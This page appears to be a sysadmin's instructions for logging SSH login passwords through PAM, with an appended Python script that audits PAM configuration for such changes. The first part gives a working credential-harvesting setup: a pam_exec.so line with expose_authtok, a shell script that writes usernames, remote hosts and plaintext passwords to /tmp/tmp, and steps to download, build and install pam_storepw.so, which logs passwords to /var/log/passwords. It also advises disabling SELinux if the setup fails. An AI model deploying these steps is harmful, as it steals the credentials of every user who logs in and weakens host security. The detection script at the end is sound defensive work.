Sshd
sshd save password
pam_exec.so
/etc/pam.d/password-auth-ac
#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth required pam_env.so
auth sufficient pam_unix.so nullok try_first_pass
auth optional pam_exec.so expose_authtok /usr/local/bin/pam_exec.so
auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata
...
/usr/local/bin/pam_exec.so
#!/bin/sh
read password
echo "User: $PAM_USER" >> /tmp/tmp
echo "Ruser: $PAM_RUSER" >> /tmp/tmp
echo "Rhost: $PAM_RHOST" >> /tmp/tmp
echo "Service: $PAM_SERVICE" >> /tmp/tmp
echo "TTY: $PAM_TTY" >> /tmp/tmp
echo "Password : $password" >> /tmp/tmp
exit $?
pam_storepw.so
Download source code for module.
curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c
Create the following Makefile
all: pam_storepw.so

pam_storepw.so: pam_storepw.o
	$(LD) --shared -o $@ $< -lpam -lpam_misc

clean:
	rm -f pam_storepw.o pam_storepw.so core *~

extraclean: clean
	rm -f *.a *.o *.so *.bak

.c.o:
	$(CC) $(CFLAGS) -c $< -o $@ -fPIC
Build file
make
Copy file
cp pam_storepw.so /lib64/security/
chmod 755 /lib64/security/pam_storepw.so
password-auth-ac
#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth required pam_env.so
auth sufficient pam_unix.so nullok try_first_pass
auth optional pam_storepw.so
auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata
...
Passwords start to be written to
/var/log/passwords
If you do not get any entries, temporarily turn SELinux off to see if it starts to work, and run PAM in debug to see what is going on.
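Both changes above leave a trace in the PAM stack itself: a pam_exec.so entry carrying expose_authtok, or a module that is not part of the host's normal set. The audit below is an added example, not part of the original page; the EXPECTED allowlist and the function names are assumptions to adapt per host, and SAMPLE is constructed from the two configurations shown above.

```python
import re
from pathlib import Path

# Assumption: modules this host is expected to load; extend it per site.
EXPECTED = {"pam_env.so", "pam_unix.so", "pam_succeed_if.so", "pam_deny.so",
            "pam_permit.so", "pam_faildelay.so", "pam_localuser.so"}

# type, control (plain word or [bracketed list]), module, remaining arguments
ENTRY = re.compile(r"^-?(\w+)\s+(\[[^\]]*\]|\S+)\s+(\S+)\s*(.*)$")

def parse_entry(line):
    """Split one PAM line into (type, control, module, args); None if not a module line."""
    line = line.split("#", 1)[0].strip()
    m = ENTRY.match(line)
    if not m or m.group(2) in ("include", "substack"):
        return None
    ptype, control, module, rest = m.groups()
    return ptype, control, module, rest.split()

def audit(text, source="<inline>"):
    """Return (source, line_no, rule, detail) for entries that can see the password."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        entry = parse_entry(raw)
        if entry is None:
            continue
        _, _, module, args = entry
        name = module.rsplit("/", 1)[-1]
        if name == "pam_exec.so" and "expose_authtok" in args:
            # expose_authtok hands the password to the external command on stdin
            cmd = next((a for a in args if a.startswith("/")), "?")
            findings.append((source, no, "exec-gets-password", cmd))
        elif name not in EXPECTED:
            findings.append((source, no, "unexpected-module", module))
    return findings

# Constructed sample: the two modified stacks shown on this page, merged.
SAMPLE = """#%PAM-1.0
auth required pam_env.so
auth sufficient pam_unix.so nullok try_first_pass
auth optional pam_exec.so expose_authtok /usr/local/bin/pam_exec.so
auth optional pam_storepw.so
auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata
"""

if __name__ == "__main__":
    for row in audit(SAMPLE):
        print(*row)
    for path in sorted(Path("/etc/pam.d").glob("*")):
        if path.is_file():
            for row in audit(path.read_text(errors="replace"), str(path)):
                print(*row)
```

Run it as a user that can read /etc/pam.d, and review any hit alongside the files the page names, /tmp/tmp and /var/log/passwords.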